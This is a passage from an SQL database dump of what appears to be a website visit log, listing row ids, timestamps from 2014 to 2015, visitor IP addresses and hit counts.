22:02:29','162.244.13.104',1),(1025,1,'2014-09-23 02:18:33','73.33.180.224',1),(1026,1,'2014-09-23 05:02:46','123.125.71.114',1),(1027,1,'2014-09-23 08:48:42','192.99.149.88',2),(1028,1,'2014-09-23 18:52:45','54.211.196.197',2),(1029,1,'2014-09-23 20:06:50','192.99.149.88',1),(1030,1,'2014-09-24 10:30:52','208.115.111.70',1),(1031,1,'2014-09-24 17:34:20','38.111.147.84',2),(1032,1,'2014-09-24 20:26:24','50.73.101.173',1),(1033,1,'2014-09-24 23:05:28','192.99.149.88',2),(1034,1,'2014-09-25 05:19:25','192.99.149.88',2),(1035,1,'2014-09-26 00:48:44','108.50.47.167',1),(1036,1,'2014-09-26 20:43:52','208.115.113.86',2),(1037,1,'2014-09-27 10:43:21','66.249.79.100',1),(1038,1,'2014-09-28 00:36:36','207.46.13.102',3),(1039,1,'2014-09-29 00:52:39','207.46.13.102',1),(1040,1,'2014-09-29 01:35:32','74.103.25.239',1),(1041,1,'2014-09-29 20:13:41','207.46.13.102',1),(1042,1,'2014-09-29 23:21:04','68.180.225.105',3),(1043,1,'2014-09-30 14:11:33','192.99.149.88',4),(1044,1,'2014-09-30 15:22:58','107.170.12.81',3),(1045,1,'2014-09-30 18:46:25','217.69.133.230',1),(1046,1,'2014-09-30 19:59:36','54.164.135.72',1),(1047,1,'2014-09-30 21:44:58','50.73.101.173',1),(1048,1,'2014-09-30 23:09:29','65.207.116.226',2),(1049,1,'2014-10-01 00:57:22','220.181.108.101',1),(1050,1,'2014-10-01 01:28:10','98.204.254.54',1),(1051,1,'2014-10-01 05:43:25','54.172.6.85',1),(1052,1,'2014-10-01 19:26:35','209.124.169.250',1),(1053,1,'2014-10-02 14:56:08','192.99.149.88',2),(1054,1,'2014-10-02 23:51:30','144.76.183.41',2),(1055,1,'2014-10-03 15:15:09','180.76.5.194',1),(1056,1,'2014-10-05 10:06:33','69.50.234.133',2),(1057,1,'2014-10-05 21:31:17','207.46.13.102',1),(1058,1,'2014-10-07 03:50:00','81.144.138.34',2),(1059,1,'2014-10-07 12:11:05','66.249.69.132',1),(1060,1,'2014-10-07 19:29:43','66.249.69.132',1),(1061,1,'2014-10-08 18:51:55','66.249.69.132',1),(1062,1,'2014-10-09 02:38:29','220.181.108.81',1),(1063,1,'2014-10-09 18:41:09','208.115.111.70',1),(1064,1,'2014-10-09 19:03:24','192.99.149.88',2),(1065,1,'2014-10-09 20:33:02','71.126.181.150',1),(1066,1,'2014-10-09 22:15:48','192.99.149.88',2),(1067,1,'2014-10-09 23:13:48','5.9.112.67',2),(1068,1,'2014-10-10 14:47:53','66.249.69.116',1),(1069,1,'2014-10-11 07:43:54','66.249.69.100',1),(1070,1,'2014-10-11 09:26:15','69.58.178.58',3),(1071,1,'2014-10-11 11:40:01','96.244.254.106',2),(1072,1,'2014-10-12 11:43:03','157.55.39.66',1),(1073,1,'2014-10-12 21:43:56','192.99.149.88',1),(1074,1,'2014-10-13 03:31:17','96.244.68.77',1),(1075,1,'2014-10-13 08:45:02','66.249.69.116',1),(1076,1,'2014-10-13 15:54:27','54.165.181.158',1),(1077,1,'2014-10-13 21:42:35','66.249.69.132',3),(1078,1,'2014-10-14 01:14:30','208.115.113.86',1),(1079,1,'2014-10-14 16:40:52','64.124.9.130',1),(1080,1,'2014-10-14 17:40:58','192.99.149.88',2),(1081,1,'2014-10-14 19:28:07','207.46.13.108',1),(1082,1,'2014-10-15 00:04:46','71.179.61.104',1),(1083,1,'2014-10-15 11:56:24','66.249.69.132',1),(1084,1,'2014-10-15 21:53:45','54.164.183.58',1),(1085,1,'2014-10-16 07:46:15','66.249.69.116',1),(1086,1,'2014-10-16 08:38:05','66.249.69.116',1),(1087,1,'2014-10-16 11:34:58','123.125.71.58',1),(1088,1,'2014-10-16 12:22:48','207.46.13.108',1),(1089,1,'2014-10-16 16:40:03','158.74.35.7',1),(1090,1,'2014-10-16 20:00:39','192.99.149.88',2),(1091,1,'2014-10-18 00:11:01','69.251.214.14',2),(1092,1,'2014-10-18 03:17:13','173.66.97.68',1),(1093,1,'2014-10-18 07:51:39','66.249.69.132',1),(1094,1,'2014-10-18 20:13:27','192.99.149.88',2),(1095,1,'2014-10-18 21:30:43','66.249.83.35',1),(1096,1,'2014-10-19 09:54:14','66.249.69.100',1),(1097,1,'2014-10-19 14:22:12','66.249.69.132',1),(1098,1,'2014-10-19 16:11:31','66.249.69.132',1),(1099,1,'2014-10-19 21:27:24','66.249.69.132',1),(1100,1,'2014-10-19 23:08:25','66.249.69.116',3),(1101,1,'2014-10-20 03:18:29','66.249.69.116',1),(1102,1,'2014-10-20 10:07:04','209.249.5.252',3),(1103,1,'2014-10-20 15:04:49','49.145.7.51',1),(1104,1,'2014-10-20 16:10:27','46.246.42.202',1),(1105,1,'2014-10-20 23:12:22','123.125.71.96',3),(1106,1,'2014-10-21 01:51:38','98.117.35.210',1),(1107,1,'2014-10-21 05:34:53','66.249.79.84',1),(1108,1,'2014-10-21 06:36:28','66.249.79.100',1),(1109,1,'2014-10-21 08:24:28','98.233.143.92',1),(1110,1,'2014-10-21 21:29:28','204.236.235.245',1),(1111,1,'2014-10-21 22:23:05','204.236.235.245',2),(1112,1,'2014-10-22 18:03:51','180.76.6.130',2),(1113,1,'2014-10-23 00:20:34','77.68.227.217',2),(1114,1,'2014-10-23 02:12:49','180.76.6.139',1),(1115,1,'2014-10-23 13:27:46','66.249.69.132',1),(1116,1,'2014-10-23 14:26:03','159.142.117.174',2),(1117,1,'2014-10-24 00:37:49','157.55.39.132',1),(1118,1,'2014-10-24 04:02:21','107.170.1.51',2),(1119,1,'2014-10-24 07:35:48','66.249.69.100',1),(1120,1,'2014-10-25 01:49:35','66.249.69.116',1),(1121,1,'2014-10-25 07:57:04','66.249.69.100',1),(1122,1,'2014-10-25 10:15:26','5.9.127.154',2),(1123,1,'2014-10-26 04:51:26','69.251.165.173',1),(1124,1,'2014-10-26 06:16:13','208.115.111.70',1),(1125,1,'2014-10-26 12:52:31','194.153.113.13',2),(1126,1,'2014-10-26 16:41:01','66.87.83.167',2),(1127,1,'2014-10-26 23:53:49','69.140.198.246',1),(1128,1,'2014-10-28 14:02:30','123.125.71.82',1),(1129,1,'2014-10-29 00:41:32','208.115.113.86',1),(1130,1,'2014-10-29 02:09:51','173.69.167.12',3),(1131,1,'2014-10-29 15:36:05','138.162.0.43',1),(1132,1,'2014-10-30 00:58:57','99.76.9.19',1),(1133,1,'2014-10-30 03:34:32','98.117.35.210',1),(1134,1,'2014-10-30 14:05:37','204.84.164.4',1),(1135,1,'2014-10-31 11:53:07','123.125.71.75',1),(1136,1,'2014-10-31 15:25:11','128.231.234.62',2),(1137,1,'2014-10-31 17:05:05','66.249.69.132',1),(1138,1,'2014-10-31 19:22:27','207.46.13.67',1),(1139,1,'2014-10-31 20:11:29','206.16.96.144',1),(1140,1,'2014-11-01 04:42:28','207.46.13.67',1),(1141,1,'2014-11-01 05:42:00','123.125.71.82',1),(1142,1,'2014-11-01 08:11:57','207.46.13.67',1),(1143,1,'2014-11-01 15:28:10','96.244.68.77',1),(1144,1,'2014-11-02 11:07:48','180.76.6.158',1),(1145,1,'2014-11-02 17:43:04','157.55.39.89',1),(1146,1,'2014-11-02 19:23:24','157.55.39.89',1),(1147,1,'2014-11-02 22:11:18','66.249.69.132',1),(1148,1,'2014-11-02 23:59:07','71.179.61.104',2),(1149,1,'2014-11-03 10:28:21','71.179.12.243',1),(1150,1,'2014-11-03 17:05:44','142.4.215.116',2),(1151,1,'2014-11-03 21:10:36','207.76.142.9',1),(1152,1,'2014-11-04 00:29:14','78.158.11.226',1),(1153,1,'2014-11-04 16:14:26','198.203.181.181',1),(1154,1,'2014-11-04 18:00:02','180.76.6.153',1),(1155,1,'2014-11-05 18:59:40','66.249.69.116',1),(1156,1,'2014-11-06 17:23:43','8.28.16.254',2),(1157,1,'2014-11-06 19:20:21','167.102.191.10',3),(1158,1,'2014-11-08 14:10:41','94.153.9.9',1),(1159,1,'2014-11-08 18:59:37','157.55.39.248',1),(1160,1,'2014-11-09 05:54:49','123.125.71.21',1),(1161,1,'2014-11-09 06:09:33','82.192.74.173',2),(1162,1,'2014-11-09 12:59:49','180.76.6.54',1),(1163,1,'2014-11-10 04:27:47','68.180.228.111',1),(1164,1,'2014-11-10 12:10:34','66.249.69.100',1),(1165,1,'2014-11-10 22:58:42','68.180.228.111',1),(1166,1,'2014-11-10 23:08:59','157.55.39.248',1),(1167,1,'2014-11-11 09:33:59','69.58.178.58',2),(1168,1,'2014-11-11 21:39:22','123.125.71.106',1),(1169,1,'2014-11-11 22:02:57','208.115.111.70',1),(1170,1,'2014-11-12 07:45:57','180.76.6.230',1),(1171,1,'2014-11-12 23:25:18','66.249.69.132',1),(1172,1,'2014-11-13 02:55:49','123.125.71.87',1),(1173,1,'2014-11-13 14:57:38','66.249.69.116',1),(1174,1,'2014-11-14 04:36:34','208.115.113.86',1),(1175,1,'2014-11-14 08:48:32','77.75.77.17',1),(1176,1,'2014-11-14 16:52:52','162.243.192.225',2),(1177,1,'2014-11-15 00:06:32','180.76.6.14',1),(1178,1,'2014-11-15 20:18:34','207.46.13.27',1),(1179,1,'2014-11-16 21:10:07','66.249.69.132',1),(1180,1,'2014-11-17 02:28:05','72.13.136.125',1),(1181,1,'2014-11-17 08:20:30','77.75.77.36',1),(1182,1,'2014-11-17 14:49:46','207.46.13.27',1),(1183,1,'2014-11-17 20:55:36','198.202.2.42',1),(1184,1,'2014-11-17 22:37:19','146.120.158.159',2),(1185,1,'2014-11-18 18:15:08','123.125.71.107',1),(1186,1,'2014-11-18 20:16:24','207.46.13.27',1),(1187,1,'2014-11-18 21:30:25','77.75.73.11',1),(1188,1,'2014-11-18 23:21:31','98.117.35.210',2),(1189,1,'2014-11-19 07:26:12','207.46.13.27',1),(1190,1,'2014-11-20 23:49:12','178.255.215.91',2),(1191,1,'2014-11-21 05:58:26','66.249.69.132',1),(1192,1,'2014-11-21 07:09:48','66.249.69.100',1),(1193,1,'2014-11-21 08:48:50','66.249.69.132',1),(1194,1,'2014-11-21 23:58:55','66.249.69.116',1),(1195,1,'2014-11-22 03:22:09','68.180.228.111',3),(1196,1,'2014-11-22 22:35:05','180.76.5.69',1),(1197,1,'2014-11-24 12:40:07','220.181.108.167',1),(1198,1,'2014-11-24 19:52:26','68.180.228.111',1),(1199,1,'2014-11-25 01:59:32','220.181.108.161',1),(1200,1,'2014-11-25 20:58:49','157.55.39.2',1),(1201,1,'2014-11-26 17:11:44','70.62.97.98',1),(1202,1,'2014-11-27 02:38:24','180.76.6.137',1),(1203,1,'2014-11-28 20:25:11','157.55.39.194',1),(1204,1,'2014-11-28 22:21:33','66.249.75.20',1),(1205,1,'2014-11-29 00:08:31','66.249.75.12',1),(1206,1,'2014-11-29 03:12:32','66.249.75.20',1),(1207,1,'2014-11-29 06:39:37','66.249.75.36',1),(1208,1,'2014-11-30 10:08:46','66.249.75.12',1),(1209,1,'2014-11-30 12:17:51','66.249.75.12',1),(1210,1,'2014-12-01 03:19:25','207.106.190.66',2),(1211,1,'2014-12-01 04:53:09','157.55.39.194',1),(1212,1,'2014-12-01 14:36:34','220.181.108.85',1),(1213,1,'2014-12-02 06:16:54','66.249.75.36',1),(1214,1,'2014-12-02 08:40:15','68.180.228.111',1),(1215,1,'2014-12-02 10:11:19','66.249.75.12',1),(1216,1,'2014-12-02 11:58:26','178.255.215.67',1),(1217,1,'2014-12-02 15:03:04','208.110.85.226',9),(1218,1,'2014-12-02 18:42:17','146.7.187.31',1),(1219,1,'2014-12-03 01:07:51','208.115.111.70',1),(1220,1,'2014-12-03 08:42:11','69.50.234.130',2),(1221,1,'2014-12-03 10:35:09','100.43.85.24',1),(1222,1,'2014-12-03 11:35:04','157.55.39.194',1),(1223,1,'2014-12-04 06:16:35','123.125.71.89',1),(1224,1,'2014-12-04 10:31:02','142.4.215.116',2),(1225,1,'2014-12-05 01:14:12','207.106.190.66',2),(1226,1,'2014-12-05 14:07:14','68.180.228.111',1),(1227,1,'2014-12-06 00:34:27','202.46.50.87',1),(1228,1,'2014-12-06 14:20:59','199.107.67.100',1),(1229,1,'2014-12-06 15:20:31','167.102.159.2',2),(1230,1,'2014-12-06 20:45:11','66.249.75.12',1),(1231,1,'2014-12-07 00:29:17','173.69.167.12',1),(1232,1,'2014-12-07 01:01:01','66.249.75.12',1),(1233,1,'2014-12-07 04:28:55','123.125.71.102',1),(1234,1,'2014-12-07 05:21:03','123.125.71.90',1),(1235,1,'2014-12-07 10:16:55','66.249.75.20',1),(1236,1,'2014-12-07 18:01:26','202.46.48.56',7),(1237,1,'2014-12-07 20:26:33','208.110.85.226',7),(1238,1,'2014-12-08 00:49:47','208.110.85.226',1),(1239,1,'2014-12-08 04:50:33','192.95.29.116',2),(1240,1,'2014-12-09 03:25:28','207.46.13.69',1),(1241,1,'2014-12-09 10:59:08','66.249.75.36',1),(1242,1,'2014-12-10 05:47:30','123.125.71.25',1),(1243,1,'2014-12-10 19:24:59','54.85.116.12',2),(1244,1,'2014-12-11 15:25:31','69.58.178.57',2),(1245,1,'2014-12-11 20:01:32','180.76.5.144',1),(1246,1,'2014-12-12 05:52:36','85.17.73.171',2),(1247,1,'2014-12-12 14:27:23','8.28.16.254',4),(1248,1,'2014-12-12 22:49:08','68.180.228.111',1),(1249,1,'2014-12-13 01:56:58','207.106.190.66',2),(1250,1,'2014-12-13 02:28:19','207.106.190.66',2),(1251,1,'2014-12-13 03:42:55','68.180.228.111',1),(1252,1,'2014-12-13 04:55:26','50.153.125.26',1),(1253,1,'2014-12-13 21:40:21','206.253.226.12',2),(1254,1,'2014-12-14 04:12:09','100.43.85.24',1),(1255,1,'2014-12-14 05:00:31','98.233.146.127',1),(1256,1,'2014-12-14 06:21:54','207.46.13.69',1),(1257,1,'2014-12-14 13:31:43','66.249.75.20',1),(1258,1,'2014-12-15 01:15:47','173.66.236.17',1),(1259,1,'2014-12-15 09:00:31','66.249.75.20',2),(1260,1,'2014-12-16 02:17:25','66.249.75.36',1),(1261,1,'2014-12-16 05:49:51','8.21.241.165',1),(1262,1,'2014-12-16 06:02:35','66.249.75.20',1),(1263,1,'2014-12-16 17:21:48','209.124.169.250',2),(1264,1,'2014-12-16 19:34:30','66.249.75.36',1),(1265,1,'2014-12-16 20:47:50','170.74.55.84',2),(1266,1,'2014-12-17 11:53:52','66.249.75.20',1),(1267,1,'2014-12-17 13:04:59','66.249.75.12',1),(1268,1,'2014-12-17 17:02:08','123.125.71.73',1),(1269,1,'2014-12-17 23:53:43','66.249.65.161',1),(1270,1,'2014-12-18 14:35:22','166.216.165.85',1),(1271,1,'2014-12-19 00:13:53','198.27.80.144',2),(1272,1,'2014-12-19 17:21:02','66.249.75.36',1),(1273,1,'2014-12-20 12:12:57','96.234.155.50',3),(1274,1,'2014-12-20 20:47:25','78.158.11.226',1),(1275,1,'2014-12-21 05:44:03','66.249.75.20',1),(1276,1,'2014-12-21 08:30:13','180.76.6.154',1),(1277,1,'2014-12-21 09:37:08','77.75.73.11',1),(1278,1,'2014-12-22 05:21:44','207.46.13.69',1),(1279,1,'2014-12-22 11:43:07','68.180.228.111',1),(1280,1,'2014-12-22 19:09:26','77.75.77.11',1),(1281,1,'2014-12-23 01:53:55','66.87.81.106',1),(1282,1,'2014-12-23 17:38:41','207.46.13.69',1),(1283,1,'2014-12-23 21:12:33','207.46.13.69',1),(1284,1,'2014-12-25 02:57:10','77.75.77.11',1),(1285,1,'2014-12-25 05:52:08','180.76.6.42',1),(1286,1,'2014-12-26 01:01:35','220.181.108.90',1),(1287,1,'2014-12-26 07:55:17','209.249.5.249',2),(1288,1,'2014-12-26 22:18:16','66.249.75.20',1),(1289,1,'2014-12-27 08:17:39','220.181.108.180',1),(1290,1,'2014-12-27 11:05:26','108.17.4.19',1),(1291,1,'2014-12-27 20:57:18','46.246.38.108',1),(1292,1,'2014-12-28 10:01:11','100.43.85.24',1),(1293,1,'2014-12-28 16:09:59','37.16.72.208',2),(1294,1,'2014-12-29 06:56:34','180.76.6.60',1),(1295,1,'2014-12-30 03:52:18','71.230.148.24',1),(1296,1,'2014-12-30 12:57:33','217.69.133.228',1),(1297,1,'2014-12-30 13:07:14','72.81.129.119',1),(1298,1,'2014-12-31 04:03:59','93.92.217.228',1),(1299,1,'2014-12-31 12:42:13','217.69.133.227',1),(1300,1,'2014-12-31 15:58:09','66.249.75.20',1),(1301,1,'2014-12-31 20:57:06','68.180.228.111',1),(1302,1,'2014-12-31 21:23:04','157.55.39.251',1),(1303,1,'2015-01-02 02:11:10','195.154.181.152',3),(1304,1,'2015-01-02 10:36:19','62.210.83.64',1),(1305,1,'2015-01-02 22:10:56','220.181.108.151',1),(1306,1,'2015-01-02 23:37:59','5.9.36.119',2),(1307,1,'2015-01-03 03:26:30','207.46.13.141',2),(1308,1,'2015-01-03 07:19:48','123.125.71.108',2),(1309,1,'2015-01-03 13:55:33','68.180.228.111',1),(1310,1,'2015-01-03 21:18:11','70.192.212.184',1),(1311,1,'2015-01-03 23:40:40','208.54.35.128',1),(1312,1,'2015-01-04 02:45:51','31.148.246.72',2),(1313,1,'2015-01-04 17:38:00','178.137.85.199',1),(1314,1,'2015-01-04 18:24:35','66.249.75.20',1),(1315,1,'2015-01-04 19:38:57','66.249.75.20',1),(1316,1,'2015-01-05 05:40:26','81.144.138.34',2),(1317,1,'2015-01-07 16:02:00','156.33.241.11',1),(1318,1,'2015-01-07 21:12:11','66.249.75.20',1),(1319,1,'2015-01-08 01:26:04','83.28.53.68',1),(1320,1,'2015-01-09 04:26:07','74.61.254.173',1),(1321,1,'2015-01-10 00:27:19','66.249.75.12',1),(1322,1,'2015-01-10 03:13:29','207.46.13.141',1),(1323,1,'2015-01-10 16:45:20','66.249.75.20',2),(1324,1,'2015-01-10 20:36:51','71.245.166.8',2),(1325,1,'2015-01-11 02:15:59','71.245.166.8',1),(1326,1,'2015-01-11 08:17:59','220.181.108.154',1),(1327,1,'2015-01-11 10:31:56','69.58.178.57',2),(1328,1,'2015-01-12 07:18:04','82.80.249.155',3),(1329,1,'2015-01-12 12:17:07','180.76.5.177',1),(1330,1,'2015-01-12 17:22:09','8.28.16.254',2),(1331,1,'2015-01-12 19:33:48','180.76.5.65',2),(1332,1,'2015-01-13 02:46:32','108.9.42.193',1),(1333,1,'2015-01-13 18:16:53','167.102.191.18',1),(1334,1,'2015-01-14 01:30:44','70.208.144.215',1),(1335,1,'2015-01-15 03:17:48','73.180.133.238',2),(1336,1,'2015-01-15 19:06:18','162.243.193.136',2),(1337,1,'2015-01-15 22:31:36','71.166.53.10',1),(1338,1,'2015-01-16 02:40:34','220.181.108.76',1),(1339,1,'2015-01-16 11:39:34','66.249.75.12',1),(1340,1,'2015-01-16 16:19:13','108.15.105.88',1),(1341,1,'2015-01-17 08:21:42','207.46.13.141',1),(1342,1,'2015-01-17 17:42:20','71.121.155.31',2),(1343,1,'2015-01-17 23:24:21','108.61.215.212',1),(1344,1,'2015-01-18 06:44:19','54.175.227.66',2),(1345,1,'2015-01-19 07:12:03','123.125.71.99',1),(1346,1,'2015-01-19 11:23:59','207.46.13.141',1),(1347,1,'2015-01-19 12:29:26','54.175.239.91',1),(1348,1,'2015-01-19 12:29:26','54.84.65.191',1),(1349,1,'2015-01-19 14:02:45','76.21.232.239',1),(1350,1,'2015-01-19 15:13:40','207.46.13.141',1),(1351,1,'2015-01-19 22:19:14','66.249.75.36',1),(1352,1,'2015-01-19 23:57:34','66.249.75.20',1),(1353,1,'2015-01-20 01:50:46','74.103.16.199',1),(1354,1,'2015-01-20 15:16:58','63.119.86.1',1),(1355,1,'2015-01-20 16:56:07','192.30.51.10',1),(1356,1,'2015-01-21 03:03:19','74.61.254.173',4),(1357,1,'2015-01-21 07:07:05','68.180.228.111',1),(1358,1,'2015-01-21 20:25:41','68.180.228.111',1),(1359,1,'2015-01-22 03:11:49','62.210.129.223',1),(1360,1,'2015-01-22 06:08:11','180.76.5.27',1),(1361,1,'2015-01-23 00:08:23','77.75.77.36',1),(1362,1,'2015-01-23 01:06:12','77.75.77.36',3),(1363,1,'2015-01-23 04:23:30','206.225.83.43',2),(1364,1,'2015-01-23 07:42:54','180.76.6.63',1),(1365,1,'2015-01-23 13:40:35','66.249.65.65',2),(1366,1,'2015-01-24 03:44:42','195.154.181.152',3),(1367,1,'2015-01-24 06:01:27','37.213.140.144',2),(1368,1,'2015-01-24 18:02:05','66.249.65.65',1),(1369,1,'2015-01-25 07:47:09','93.92.217.228',1),(1370,1,'2015-01-25 07:47:09','93.92.217.228',1),(1371,1,'2015-01-25 08:05:04','207.46.13.141',1),(1372,1,'2015-01-25 16:59:04','123.125.71.116',1),(1373,1,'2015-01-25 22:57:12','180.76.6.17',1),(1374,1,'2015-01-26 01:29:57','174.127.133.64',2),(1375,1,'2015-01-26 10:20:04','180.76.5.166',1),(1376,1,'2015-01-26 13:14:08','176.31.126.56',2),(1377,1,'2015-01-26 18:05:00','180.76.5.167',2),(1378,2,'2015-01-26 19:13:59','206.16.96.144',1),(1379,2,'2015-01-27 00:14:47','108.3.238.12',1),(1380,1,'2015-01-27 00:15:14','108.3.238.12',1),(1381,1,'2015-01-27 13:55:38','207.46.13.141',1),(1382,1,'2015-01-27 14:06:41','207.46.13.141',1),(1383,1,'2015-01-27 22:00:25','207.46.13.141',1),(1384,2,'2015-01-28 20:35:07','207.46.13.81',1),(1385,2,'2015-01-29 02:05:26','157.55.39.164',1),(1386,2,'2015-01-29 03:47:18','66.249.67.92',2),(1387,2,'2015-01-29 10:59:45','157.55.39.164',1),(1388,2,'2015-01-29 14:26:43','167.102.228.20',3),(1389,2,'2015-01-29 17:01:01','68.180.228.111',2),(1390,2,'2015-01-30 00:59:06','50.246.84.107',1),(1391,1,'2015-01-30 01:36:37','68.180.228.111',1),(1392,2,'2015-01-30 03:50:11','100.43.85.24',1),(1393,1,'2015-01-30 06:53:25','220.181.108.158',1),(1394,2,'2015-01-30 20:55:57','70.17.11.87',1),(1395,2,'2015-01-31 03:07:23','108.40.121.170',1),(1396,1,'2015-01-31 10:50:20','64.79.111.100',1),(1397,2,'2015-01-31 14:53:03','66.249.67.100',1),(1398,2,'2015-01-31 17:27:20','73.39.59.151',1),(1399,1,'2015-01-31 17:28:42','73.39.59.151',1),(1400,1,'2015-02-01 01:29:07','68.180.228.111',1),(1401,1,'2015-02-01 02:01:18','73.39.59.151',1),(1402,2,'2015-02-01 03:06:06','220.181.108.176',2),(1403,2,'2015-02-01 22:06:36','71.179.205.233',5),(1404,2,'2015-02-02 01:46:25','173.69.175.88',1),(1405,1,'2015-02-02 05:16:11','104.131.217.158',2),(1406,2,'2015-02-02 05:16:35','104.131.217.158',2),(1407,1,'2015-02-02 07:54:56','54.224.212.105',1),(1408,2,'2015-02-02 08:46:08','76.29.124.58',1),(1409,2,'2015-02-03 01:05:57','172.56.3.232',1),(1410,2,'2015-02-03 10:29:08','77.75.77.11',1),(1411,2,'2015-02-03 12:56:38','128.231.237.4',1),(1412,2,'2015-02-03 16:11:33','66.87.80.38',4),(1413,1,'2015-02-03 16:18:41','78.46.38.10',2),(1414,2,'2015-02-03 18:28:37','96.244.68.77',1),(1415,2,'2015-02-03 21:35:11','71.179.9.199',3),(1416,2,'2015-02-04 01:50:52','76.100.198.110',1),(1417,2,'2015-02-04 02:23:23','108.50.43.193',1),(1418,1,'2015-02-04 08:25:49','207.46.13.141',1),(1419,2,'2015-02-04 14:34:04','207.46.13.81',1),(1420,2,'2015-02-04 17:09:35','24.104.140.60',2),(1421,2,'2015-02-04 21:20:11','66.249.67.92',1),(1422,2,'2015-02-05 07:34:23','66.249.67.100',1),(1423,1,'2015-02-05 11:27:46','180.76.6.225',1),(1424,1,'2015-02-06 02:25:07','99.158.132.209',2),(1425,2,'2015-02-06 02:59:20','69.251.106.192',1),(1426,1,'2015-02-06 03:00:00','69.251.106.192',1),(1427,2,'2015-02-06 03:02:47','69.251.106.192',1),(1428,2,'2015-02-06 04:48:02','180.76.6.16',1),(1429,1,'2015-02-06 09:39:36','180.76.5.80',1),(1430,2,'2015-02-07 01:02:46','71.179.205.233',1),(1431,1,'2015-02-07 04:17:41','207.46.13.53',1),(1432,1,'2015-02-07 05:34:02','76.100.115.177',1),(1433,2,'2015-02-07 05:39:20','76.100.115.177',2),(1434,1,'2015-02-07 08:38:26','207.46.13.53',1),(1435,2,'2015-02-07 09:31:40','207.46.13.7',1),(1436,1,'2015-02-07 13:25:26','162.129.251.69',1),(1437,1,'2015-02-08 07:40:07','46.4.113.114',1),(1438,1,'2015-02-09 02:31:24','66.249.83.194',1),(1439,1,'2015-02-09 03:15:08','52.0.250.53',2),(1440,2,'2015-02-09 14:29:41','214.37.45.6',1),(1441,1,'2015-02-09 22:46:52','94.23.27.166',2),(1442,2,'2015-02-09 22:46:56','94.23.27.166',2),(1443,1,'2015-02-10 00:54:25','68.54.163.153',1),(1444,2,'2015-02-10 03:30:16','74.107.123.93',1),(1445,2,'2015-02-10 06:26:15','123.125.71.101',1),(1446,2,'2015-02-10 15:16:07','85.17.73.171',2),(1447,1,'2015-02-10 15:16:13','85.17.73.171',2),(1448,2,'2015-02-10 19:59:37','180.76.5.17',1),(1449,1,'2015-02-11 10:32:01','69.58.178.58',2),(1450,2,'2015-02-11 10:32:12','69.58.178.58',1),(1451,2,'2015-02-11 11:34:39','157.55.39.187',1),(1452,2,'2015-02-11 13:27:40','71.179.205.233',1),(1453,2,'2015-02-11 14:03:04','164.82.1.13',4),(1454,1,'2015-02-11 14:05:20','164.82.1.13',2),(1455,1,'2015-02-11 15:22:18','67.99.60.231',1),(1456,2,'2015-02-11 18:49:51','156.33.241.4',1),(1457,2,'2015-02-11 20:50:26','207.46.13.79',1),(1458,1,'2015-02-12 01:40:56','220.181.108.152',1),(1459,1,'2015-02-12 05:32:07','52.0.13.245',2),(1460,2,'2015-02-12 05:32:11','52.1.98.67',2),(1461,2,'2015-02-12 06:09:35','220.181.108.140',1),(1462,2,'2015-02-12 10:02:49','207.46.13.79',1),(1463,2,'2015-02-12 14:27:32','157.55.39.187',1),(1464,2,'2015-02-12 16:46:44','65.207.116.226',1),(1465,1,'2015-02-12 20:19:09','123.125.71.76',1),(1466,1,'2015-02-12 23:10:38','207.46.13.40',1),(1467,1,'2015-02-13 02:01:48','207.46.13.40',2),(1468,1,'2015-02-13 03:25:18','207.46.13.40',2),(1469,2,'2015-02-13 16:34:11','68.180.228.111',1),(1470,2,'2015-02-13 20:43:01','74.103.36.60',1),(1471,2,'2015-02-14 01:10:03','38.105.72.33',2),(1472,1,'2015-02-14 13:43:14','78.158.11.226',1),(1473,1,'2015-02-14 18:02:09','207.46.13.40',1),(1474,2,'2015-02-15 01:08:46','71.179.205.233',1),(1475,1,'2015-02-15 01:10:03','71.179.205.233',1),(1476,2,'2015-02-15 03:30:54','217.69.133.232',1),(1477,1,'2015-02-15 10:34:06','207.46.13.40',1),(1478,1,'2015-02-15 11:13:18','68.180.228.111',1),(1479,1,'2015-02-15 14:49:48','198.178.124.47',1),(1480,1,'2015-02-15 15:24:42','195.234.136.80',2),(1481,2,'2015-02-15 15:24:47','195.234.136.80',2),(1482,2,'2015-02-17 00:38:06','71.179.205.233',1),(1483,2,'2015-02-17 13:19:55','66.249.65.161',1),(1484,2,'2015-02-17 16:28:19','98.204.246.43',2),(1485,2,'2015-02-17 17:08:16','72.81.134.38',3),(1486,1,'2015-02-18 00:16:52','207.46.13.30',1),(1487,2,'2015-02-18 00:54:42','69.250.76.105',1),(1488,2,'2015-02-18 01:50:30','98.204.246.43',1),(1489,2,'2015-02-18 05:46:01','98.204.246.43',1),(1490,2,'2015-02-18 14:25:31','220.181.108.162',1),(1491,2,'2015-02-18 18:57:44','208.54.35.135',1),(1492,1,'2015-02-18 20:29:18','50.198.128.11',1),(1493,1,'2015-02-19 03:18:47','72.81.134.38',3),(1494,1,'2015-02-19 07:02:44','178.255.215.93',2),(1495,2,'2015-02-19 07:02:47','178.255.215.93',4),(1496,1,'2015-02-19 12:24:03','107.170.40.145',2),(1497,2,'2015-02-19 12:24:24','107.170.40.145',2),(1498,1,'2015-02-20 10:35:33','178.255.215.93',2),(1499,2,'2015-02-20 18:02:37','69.251.214.14',2),(1500,2,'2015-02-20 20:08:08','71.179.9.199',1),(1501,1,'2015-02-20 22:46:37','208.43.245.104',2),(1502,2,'2015-02-21 01:50:11','98.117.207.13',1),(1503,1,'2015-02-21 06:19:49','207.46.13.30',1),(1504,2,'2015-02-21 11:50:24','207.46.13.28',1),(1505,1,'2015-02-21 13:23:27','178.255.215.93',2),(1506,1,'2015-02-21 17:45:38','73.172.121.52',1),(1507,2,'2015-02-21 17:48:22','73.172.121.52',1),(1508,2,'2015-02-21 18:54:21','173.59.236.219',1),(1509,2,'2015-02-21 19:48:09','73.212.215.129',1),(1510,2,'2015-02-22 00:03:41','66.249.67.101',1),(1511,1,'2015-02-22 02:48:44','172.56.3.157',1),(1512,2,'2015-02-22 03:57:23','66.249.67.85',1),(1513,2,'2015-02-22 07:22:59','123.125.71.45',1),(1514,2,'2015-02-22 10:01:37','66.249.67.93',1),(1515,1,'2015-02-22 14:52:38','24.126.78.130',2),(1516,1,'2015-02-22 15:10:53','24.126.78.130',1),(1517,1,'2015-02-22 17:54:50','100.36.84.219',1),(1518,1,'2015-02-22 20:16:36','172.56.29.123',1),(1519,2,'2015-02-23 01:37:15','173.59.236.219',1),(1520,1,'2015-02-23 07:30:36','62.212.77.76',2),(1521,2,'2015-02-23 07:30:48','62.212.77.76',1),(1522,2,'2015-02-23 13:59:58','100.36.70.37',1),(1523,1,'2015-02-23 19:00:12','206.205.147.1',1),(1524,1,'2015-02-23 